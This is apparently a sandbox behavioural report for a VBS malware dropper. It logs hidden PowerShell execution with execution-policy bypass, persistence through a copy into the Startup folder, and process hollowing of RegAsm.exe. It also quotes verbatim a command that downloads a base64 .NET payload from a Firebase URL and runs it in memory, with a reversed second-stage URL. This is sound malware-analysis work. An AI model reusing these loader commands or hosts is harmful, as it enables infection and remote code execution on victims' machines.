QA=';$OWjuxd= [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $oWjuxD filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000300	1	1
CreateProcessInternalW Sept. 21, 2023, 6:10 p.m.	thread_identifier: 2136 thread_handle: 0x00000084 process_identifier: 2132 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\PING.EXE track: 1 command_line: ping 127.0.0.1 -n 5 filepath_r: C:\Windows\system32\PING.EXE stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
CreateProcessInternalW Sept. 21, 2023, 6:10 p.m.	thread_identifier: 2252 thread_handle: 0x00000088 process_identifier: 2248 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HP_099333DDW.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ jiÇfzNqikimIXt.vbs')" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
NtResumeThread Sept. 21, 2023, 6:10 p.m.	thread_handle: 0x000000e0 suspend_count: 1 process_identifier: 2132	1	0
CreateProcessInternalW Sept. 21, 2023, 6:10 p.m.	thread_identifier: 2304 thread_handle: 0x00000084 process_identifier: 2300 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HP_099333DDW.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ jiÇfzNqikimIXt.vbs') filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
NtResumeThread Sept. 21, 2023, 6:10 p.m.	thread_handle: 0x000002ac suspend_count: 1 process_identifier: 2300	1	0
NtResumeThread Sept. 21, 2023, 6:10 p.m.	thread_handle: 0x00000300 suspend_count: 1 process_identifier: 2300	1	0
NtResumeThread Sept. 21, 2023, 6:10 p.m.	thread_handle: 0x0000044c suspend_count: 1 process_identifier: 2300	1	0
NtResumeThread Sept. 21, 2023, 6:10 p.m.	thread_handle: 0x00000498 suspend_count: 1 process_identifier: 2300	1	0
NtResumeThread Sept. 21, 2023, 6:10 p.m.	thread_handle: 0x000002ac suspend_count: 1 process_identifier: 2424	1	0
NtResumeThread Sept. 21, 2023, 6:10 p.m.	thread_handle: 0x00000300 suspend_count: 1 process_identifier: 2424	1	0
NtResumeThread Sept. 21, 2023, 6:10 p.m.	thread_handle: 0x0000044c suspend_count: 1 process_identifier: 2424	1	0
CreateProcessInternalW Sept. 21, 2023, 6:10 p.m.	thread_identifier: 2520 thread_handle: 0x00000450 process_identifier: 2516 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "$imageUrl = 'https://firebasestorage.googleapis.com/v0/b/server-555e5.appspot.com/o/rumpe.txt?alt=media&token=21f4cafe-e9ac-408c-a2cd-b2f926f8094a';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString($imageUrl));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.emitnuR/88/251.871.64.891//:ptth'))" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 1 process_handle: 0x00000454	1	1
NtResumeThread Sept. 21, 2023, 6:11 p.m.	thread_handle: 0x00000498 suspend_count: 1 process_identifier: 2424	1	0
NtResumeThread Sept. 21, 2023, 6:10 p.m.	thread_handle: 0x000002c0 suspend_count: 1 process_identifier: 2516	1	0
NtResumeThread Sept. 21, 2023, 6:10 p.m.	thread_handle: 0x00000314 suspend_count: 1 process_identifier: 2516	1	0
NtResumeThread Sept. 21, 2023, 6:10 p.m.	thread_handle: 0x00000468 suspend_count: 1 process_identifier: 2516	1	0
NtResumeThread Sept. 21, 2023, 6:10 p.m.	thread_handle: 0x0000058c suspend_count: 1 process_identifier: 2516	1	0
CreateProcessInternalW Sept. 21, 2023, 6:11 p.m.	thread_identifier: 2872 thread_handle: 0x0000039c process_identifier: 2868 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000358	1	1
NtGetContextThread Sept. 21, 2023, 6:11 p.m.	thread_handle: 0x0000039c	1	0
NtAllocateVirtualMemory Sept. 21, 2023, 6:11 p.m.	process_identifier: 2868 region_size: 270336 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000358	1	0
WriteProcessMemory Sept. 21, 2023, 6:11 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELFeà0®Í à@ @ÈÌSàF H.text$ ® `.rsrcFà°@@.reloc¶@B base_address: 0x00400000 process_identifier: 2868 process_handle: 0x00000358	1	1
WriteProcessMemory Sept. 21, 2023, 6:11 p.m.	buffer: base_address: 0x00402000 process_identifier: 2868 process_handle: 0x00000358	1	1
WriteProcessMemory Sept. 21, 2023, 6:11 p.m.	buffer: P8h à¼\ãê¼4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°StringFileInfoø000004b0,FileDescription 0FileVersion1.0.0.0t)InternalNamee5027e73-68a7-491a-b852-8635a83d4256.exe(LegalCopyright \|)OriginalFilenamee5027e73-68a7-491a-b852-8635a83d4256.exe4ProductVersion1.0.0.08Assembly Version1.0.0.0ï»¿<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0043e000 process_identifier: 2868 process_handle: 0x00000358	1	1
WriteProcessMemory Sept. 21, 2023, 6:11 p.m.	buffer: À = base_address: 0x00440000 process_identifier: 2868 process_handle: 0x00000358	1	1
WriteProcessMemory Sept. 21, 2023, 6:11 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2868 process_handle: 0x00000358	1	1
NtSetContextThread Sept. 21, 2023, 6:11 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4443422 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000039c process_identifier: 2868	1	0
NtResumeThread Sept. 21, 2023, 6:11 p.m.	thread_handle: 0x0000039c suspend_count: 1 process_identifier: 2868	1	0
NtResumeThread Sept. 21, 2023, 6:11 p.m.	thread_handle: 0x000003d4 suspend_count: 1 process_identifier: 2516	1	0
NtResumeThread Sept. 21, 2023, 6:11 p.m.	thread_handle: 0x0000017c suspend_count: 1 process_identifier: 2868	1	0
NtResumeThread Sept. 21, 2023, 6:11 p.m.	thread_handle: 0x000001f4 suspend_count: 1 process_identifier: 2868	1	0
NtResumeThread Sept. 21, 2023, 6:11 p.m.	thread_handle: 0x00000230 suspend_count: 1 process_identifier: 2868	1	0
NtResumeThread Sept. 21, 2023, 6:11 p.m.	thread_handle: 0x000002dc suspend_count: 1 process_identifier: 2868	1	0
NtResumeThread Sept. 21, 2023, 6:11 p.m.	thread_handle: 0x00000344 suspend_count: 1 process_identifier: 2868	1	0
NtResumeThread Sept. 21, 2023, 6:11 p.m.	thread_handle: 0x000003bc suspend_count: 1 process_identifier: 2868	1	0
NtResumeThread Sept. 21, 2023, 6:11 p.m.	thread_handle: 0x000003ec suspend_count: 1 process_identifier: 2868	1	0

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (2 events)

file	C:\Windows\System32\cmd.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

HP_099333DDW.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All